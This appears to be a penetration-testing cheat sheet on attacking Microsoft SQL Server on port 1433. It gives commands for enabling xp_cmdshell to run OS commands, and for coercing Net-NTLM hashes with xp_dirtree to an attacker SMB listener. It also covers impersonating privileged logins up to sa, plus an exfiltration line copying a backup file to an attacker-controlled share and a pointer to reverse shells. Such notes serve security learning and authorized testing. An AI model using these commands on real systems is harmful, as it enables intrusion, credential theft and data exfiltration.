← Back to search

MSSQL (1433)

enumerationports

Summary

Connect with impacket-mssqlclient, then go for xp_cmdshell (code exec), xp_dirtree (hash coercion), or EXECUTE AS to impersonate a privileged login.

Walkthrough

MSSQL (port 1433) is one of the richest services on Windows targets.

Three things to try

  1. xp_cmdshell → code exec — enable advanced options + xp_cmdshell, then

run OS commands. From there download a reverse shell and catch it.

  1. xp_dirtree → hash coercion — point the server at your SMB listener

(impacket-smbserver share . -smb2support) to capture the SQL service account's Net-NTLM hash, then crack or relay it.

  1. EXECUTE AS → privilege jump — if your login has IMPERSONATE on a

higher-priv login (or db_owner on a trustworthy DB), impersonate it; chain impersonations up to sa.

Exfil example

With xp_cmdshell you can copy files to your SMB share: `` EXEC xp_cmdshell 'copy C:\inetpub\wwwroot\backup.zip \\<KALI_IP>\share\backup.zip'; ``

> sa (or any sysadmin) + xp_cmdshell is effectively SYSTEM on the box.

Commands

bash

# Connect (SQL auth, or add -windows-auth for integrated)
impacket-mssqlclient <TARGET>/<USER>:<PASS>@<IP>
impacket-mssqlclient <TARGET>/<USER>:<PASS>@<IP> -windows-auth

other

# Enable and use xp_cmdshell for command execution
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

other

# Coerce a Net-NTLM hash to your SMB listener (then relay or crack)
EXEC xp_dirtree '\\<KALI_IP>\share',1,1;

other

# Impersonate a more privileged login if you have IMPERSONATE rights
SELECT distinct b.name FROM sys.server_permissions a
  JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
  WHERE a.permission_name = 'IMPERSONATE';
EXECUTE AS LOGIN = '<TARGET_LOGIN>';